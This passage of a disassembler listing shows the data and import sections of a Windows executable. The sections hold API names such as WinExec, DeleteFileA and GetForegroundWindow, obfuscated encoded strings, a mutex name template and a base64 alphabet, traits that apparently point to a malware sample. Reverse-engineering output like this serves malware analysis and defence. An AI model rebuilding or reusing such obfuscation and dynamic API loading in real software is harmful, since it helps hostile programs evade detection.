aEglobalmemorys db 'GLobalMemoryStatus',0
dword_44B578 dd 4DE90000h, 69746C75h, 65747942h, 69576F54h, 68436564h
; DATA XREF: sub_43A105+16D�o
db 61h, 72h, 0
byte_44B58F db 0 ; DATA XREF: sub_43A105+151�o
dd 69579000h, 68436564h, 6F547261h, 746C754Dh, 74794269h
db 65h, 0
word_44B5A6 dw 0 ; DATA XREF: sub_43A105+135�o
aTwinexec db 'WinExec',0
byte_44B5B1 db 2 dup(0), 46h ; DATA XREF: sub_43A105+119�o
aLstrlenw db 'lstrlenW',0
byte_44B5BD db 2 dup(0), 4Bh ; DATA XREF: sub_43A105+FD�o
aGetfilesize db 'GetFileSize',0
dword_44B5CC dd 43C80000h, 65736F6Ch, 646E6148h ; DATA XREF: sub_43A105+E1�o
db 6Ch, 65h, 0
byte_44B5DB db 0 ; DATA XREF: sub_43A105+C5�o
dd 72572600h, 46657469h, 656C69h
dword_44B5E8 dd 53C00000h, 69467465h, 6F50656Ch, 65746E69h ; DATA XREF: sub_43A105+A9�o
db 72h, 0
word_44B5FA dw 0 ; DATA XREF: sub_43A105+8D�o
aJdeletefilea db 'DeleteFileA',0
byte_44B609 db 2 dup(0), 0ECh ; DATA XREF: sub_43A105+71�o
aCreatefilea db 'CreateFileA',0
dword_44B618 dd 4CE70000h, 4C64616Fh, 61726269h, 417972h ; DATA XREF: sub_43A105+55�o
dword_44B628 dd 47860000h, 6F4D7465h, 656C7564h, 646E6148h, 41656Ch
; DATA XREF: sub_43A105+39�o
dword_44B63C dd 42BB0000h, 706565h ; DATA XREF: sub_43A105+1D�o
dword_44B644 dd 45980000h, 54746978h, 61657268h ; DATA XREF: sub_43A105+1�o
db 64h, 0
word_44B652 dw 0 ; DATA XREF: sub_439DDE+2EF�o
db 16h
aEnumdesktopwin db 'EnumDesktopWindows',0
dword_44B668 dd 46E10000h, 57646E69h, 6F646E69h, 41784577h ; DATA XREF: sub_439DDE+2D3�o
db 0
byte_44B679 db 2 dup(0), 56h ; DATA XREF: sub_439DDE+2B7�o
aTranslatemessa db 'TranslateMessage',0
byte_44B68D db 2 dup(0), 9Fh ; DATA XREF: sub_439DDE+29B�o
aShowwindow db 'ShowWindow',0
byte_44B69B db 0 ; DATA XREF: sub_439DDE+27F�o
dd 65539D00h, 6E695774h, 54776F64h, 41747865h
db 0
byte_44B6AD db 2 dup(0), 62h ; DATA XREF: sub_439DDE+263�o
aSetwindowlonga db 'SetWindowLongA',0
byte_44B6BF db 0 ; DATA XREF: sub_439DDE+247�o
dd 6553A000h, 6D695474h
db 65h, 72h, 0
byte_44B6CB db 0 ; DATA XREF: sub_439DDE+22B�o
dd 65530A00h, 636F4674h
db 75h, 73h, 0
byte_44B6D7 db 0 ; DATA XREF: sub_439DDE+20F�o
dd 6553B800h, 654D646Eh, 67617373h
db 65h, 41h, 0
byte_44B6E7 db 0 ; DATA XREF: sub_439DDE+1F3�o
dd 6552E800h, 74736967h, 6C437265h, 41737361h
db 0
byte_44B6F9 db 2 dup(0), 62h ; DATA XREF: sub_439DDE+1D7�o
aMovewindow db 'MoveWindow',0
byte_44B707 db 0 ; DATA XREF: sub_439DDE+1BB�o
dd 654D4000h, 67617373h, 786F4265h
db 41h, 0
word_44B716 dw 0 ; DATA XREF: sub_439DDE+19F�o
aPloadicona db 'PLoadIconA',0
byte_44B723 db 0 ; DATA XREF: sub_439DDE+183�o
dd 6F4C0100h, 75436461h, 726F7372h
db 41h, 0
word_44B732 dw 0 ; DATA XREF: sub_439DDE+167�o
aGetwindowtexta db 'GetWindowTextA',0
dword_44B744 dd 47990000h, 69577465h, 776F646Eh, 74636552h ; DATA XREF: sub_439DDE+14B�o
db 0
byte_44B755 db 2 dup(0), 33h ; DATA XREF: sub_439DDE+12F�o
aGetwindowlonga db 'GetWindowLongA',0
byte_44B767 db 0 ; DATA XREF: sub_439DDE+113�o
dd 6547AD00h, 6E695774h, 776F64h
dword_44B774 dd 47940000h, 654D7465h, 67617373h ; DATA XREF: sub_439DDE+F7�o
db 65h, 41h, 0
byte_44B783 db 0 ; DATA XREF: sub_439DDE+DB�o
dd 65472600h, 726F4674h, 6F726765h, 57646E75h, 6F646E69h
db 77h, 0
word_44B79A dw 0 ; DATA XREF: sub_439DDE+BF�o
a5getclassnamea db '5GetClassNameA',0
byte_44B7AB db 0 ; DATA XREF: sub_439DDE+A3�o
dd 69443D00h, 74617073h, 654D6863h, 67617373h
db 65h, 41h, 0
byte_44B7BF db 0 ; DATA XREF: sub_439DDE+87�o
dd 65446800h, 6F727473h, 6E695779h, 776F64h
dword_44B7D0 dd 44C30000h, 69576665h, 776F646Eh, 636F7250h ; DATA XREF: sub_439DDE+6B�o
db 41h, 0
word_44B7E2 dw 0 ; DATA XREF: sub_439DDE+4F�o
aCreatewindowex db 'CreateWindowExA',0
byte_44B7F5 db 2 dup(0), 23h ; DATA XREF: sub_439DDE:loc_439E11�o
aCallwindowproc db 'CallWindowProcA',0
dword_44B808 dd 75D20000h, 33726573h, 6C642E32h ; DATA XREF: sub_439DDE+1C�o
db 6Ch, 0
word_44B816 dw 0 ; DATA XREF: sub_439DDE+1�o
aUser32_dll_0 db ',user32.dll',0
dword_44B824 dd 0AC89000Fh, 0EFEDD5FAh, 0F3FCACE5h, 0EDA7BBBAh
; DATA XREF: sub_439B7B+5D�o
db 2 dup(0E5h), 0
byte_44B837 db 0Fh ; DATA XREF: sub_439B7B+35�o
dd 0ADFBDE00h, 0FBB8B582h, 0EDA4B2ABh, 0B2BAF0ECh
db 0B2h, 0
word_44B84A dw 4 ; DATA XREF: sub_4399CB+35�o
dd 0E3BAFCD9h
db 85h, 0
word_44B852 dw 0 ; DATA XREF: sub_4397A3:loc_43980C�o
dd 455320F4h, 43495652h
db 45h, 0
word_44B85E dw 0 ; DATA XREF: sub_4397A3+29�o
aNsystem db 'NSYSTEM',0
dword_44B868 dd 6BB60000h, 762D716Bh ; DATA XREF: sub_4396F6+2F�o
db 78h, 0
word_44B872 dw 0 ; DATA XREF: sub_4396F6:loc_439715�o
aS_mtxU_0 db '%s_mtx%u',0
asc_44B87E db 0Ah,0 ; DATA XREF: sub_43969E+1C�o
aWbgKw@hh db '$WBG{KW',0Ah
db '@HH',0
dword_44B88C dd 73100000h, 6F5F6366h, 6C642E73h ; DATA XREF: sub_43969E+1�o
db 6Ch, 0
word_44B89A dw 4 ; DATA XREF: sub_43963B+1C�o
aIni db '',0
word_44B8A2 dw 0 ; DATA XREF: sub_4394DD+A3�o
aDispgetparam db 'DispGetParam',0
word_44B8B2 dw 0 ; DATA XREF: sub_4394DD+87�o
aVariantinit db ']VariantInit',0
byte_44B8C1 db 2 dup(0), 0F2h ; DATA XREF: sub_4394DD+6B�o
aVariantclear db 'VariantClear',0
byte_44B8D1 db 2 dup(0), 57h ; DATA XREF: sub_4394DD+4F�o
aSysfreestring db 'SysFreeString',0
word_44B8E2 dw 0 ; DATA XREF: sub_4394DD:loc_439510�o
aSysallocstring db 'SysAllocString',0
dword_44B8F4 dd 1778000Ch, 0D191D14h, 564A4B0Ch, 14141Ch ; DATA XREF: sub_4394DD+1C�o
dword_44B904 dd 6FE00000h, 7561656Ch, 2E323374h, 6C6C64h ; DATA XREF: sub_4394DD+1�o
dword_44B914 dd 0B0900002h ; DATA XREF: sub_4393B1+108�o
db 0B0h, 0
word_44B91A dw 1 ; DATA XREF: sub_4393B1+D3�o
db 0C2h, 0EDh, 0
byte_44B91F db 12h ; DATA XREF: sub_4393B1:loc_4393E3�o
dd 0B6A8C500h, 0B6A9B1A6h, 0A4B1B69Ah, 0A7B6B0B1h, 0F7F6B7A4h
db 0
byte_44B935 db 0Eh, 0, 5Ch ; DATA XREF: sub_4393B1+10�o
dd 0B3E3D08h, 33383235h, 3D301F2Bh
db 2 dup(2Fh), 0
byte_44B947 db 1 ; DATA XREF: sub_43858C+D28�o
dd 5F2300h
dword_44B94C dd 0B1910002h ; DATA XREF: sub_43858C+CFC�o
db 0EDh, 0
word_44B952 dw 1 ; DATA XREF: sub_43858C+C71�o
db 0F5h, 0CFh, 0
byte_44B957 db 4 ; DATA XREF: sub_43858C:loc_4391B7�o
dd 6B6E4E00h
db 3Bh, 74h, 0
byte_44B95F db 1 ; DATA XREF: sub_43858C+6AA�o
dd 0EE9200h
dword_44B964 dd 5474000Ah, 263B3248h, 1514E39h ; DATA XREF: sub_43858C+475�o
db 4Ah, 0
word_44B972 dw 0Bh ; DATA XREF: sub_43858C:loc_438912�o
dd 9CE6FADAh, 9F979B88h, 0E4AFFFE0h
db 0
byte_44B981 db 0Ah, 0, 94h ; DATA XREF: sub_43858C+293�o
aIOK db 'Ѯ٪',0
align 10h
dword_44B990 dd 4, 0A600C8h, 0A500A9h, 0ADh ; DATA XREF: sub_43858C+21B�o
dword_44B9A0 dd 5, 330045h, 290024h, 200030h ; DATA XREF: sub_43858C+204�o
db 2 dup(0)
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: .data:off_44A2BC�o
db '://',0
align 4
dword_44B9F8 dd 9BA05972h, 11CFF6A8h, 0A00042A4h, 398F0AC9h ; DATA XREF: sub_43D6B1+58�o
dword_44BA08 dd 0FE4106E0h, 11D0399Ah, 0A0008CA4h, 398F0AC9h
; DATA XREF: sub_43C48C:loc_43C4D8�o
; sub_43D6B1+1CB�o ...
dword_44BA18 dd 34A715A0h, 11D06587h, 20004A92h, 4DACC7AFh
; DATA XREF: sub_4395B8:loc_439604�o
; sub_439857+CB�o ...
dword_44BA28 dd 3050F25Bh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h
; DATA XREF: sub_440CD0:loc_440D1C�o
dword_44BA38 dd 0B196B284h, 101ABAB4h, 0AA009CB6h, 71D3400h ; DATA XREF: sub_43F63D+1F�o
dword_44BA48 dd 20400h, 0 ; DATA XREF: sub_4395B8:loc_4395E4�o
; sub_43C48C:loc_43C4B8�o ...
dd 0C0h, 46000000h
dword_44BA58 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43858C+183�o
; sub_43A974+152�o
dword_44BA68 dd 3050F21Fh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43C5EA+68�o
; sub_44006A+70�o
dword_44BA78 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43858C+4B8�o
; sub_43858C+AC3�o ...
dword_44BA88 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43858C+9D6�o
dword_44BA98 dd 3050F240h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43C5EA+1F9�o
dword_44BAA8 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43858C+2E9�o
dword_44BAB8 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7h ; DATA XREF: sub_43D6B1+4F�o
dword_44BAC8 dd 2 dup(0) ; DATA XREF: sub_4395B8+C�o
; sub_43C48C+C�o ...
dd 0C0h, 46000000h
dword_44BAD8 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fh ; DATA XREF: sub_43858C+81�o
; sub_439857+90�o ...
dword_44BAE8 dd 10h dup(0) ; DATA XREF: sub_442580�o
; sub_442580:loc_44259A�o ...
dword_44BB28 dd 0 ; DATA XREF: sub_442524+16�o
; sub_442524:loc_442566�o ...
dd 0Fh dup(0)
dword_44BB68 dd 0 ; DATA XREF: sub_442689+C�w
; sub_442689+825�r
dword_44BB6C dd 0 ; DATA XREF: sub_442689+14�w
; sub_442689+82C�r
dword_44BB70 dd 0 ; DATA XREF: sub_442689+1C�w
; sub_442689+834�r
dword_44BB74 dd 0 ; DATA XREF: sub_442689+24�w
; sub_442689+83C�r
align 100h
_data ends
; Section 7. (virtual address 0004C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004BC00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44C000h
dd 2Bh dup(0)
dword_44C0AC dd 0 ; DATA XREF: .text:00442FB8�r
dword_44C0B0 dd 0 ; DATA XREF: sub_442FC4�r
dword_44C0B4 dd 0 ; DATA XREF: sub_442FD0�r
align 10h
dword_44C0C0 dd 0 ; DATA XREF: sub_442FDC�r
dword_44C0C4 dd 0 ; DATA XREF: sub_442FE8�r
dword_44C0C8 dd 0 ; DATA XREF: .text:00442FF4�r
dword_44C0CC dd 0 ; DATA XREF: .text:00443000�r
dword_44C0D0 dd 0 ; DATA XREF: sub_44300C�r
dword_44C0D4 dd 0 ; DATA XREF: sub_443018�r
dword_44C0D8 dd 0 ; DATA XREF: sub_443024�r
dword_44C0DC dd 0 ; DATA XREF: sub_443030�r
align 1000h
_idata2 ends
end start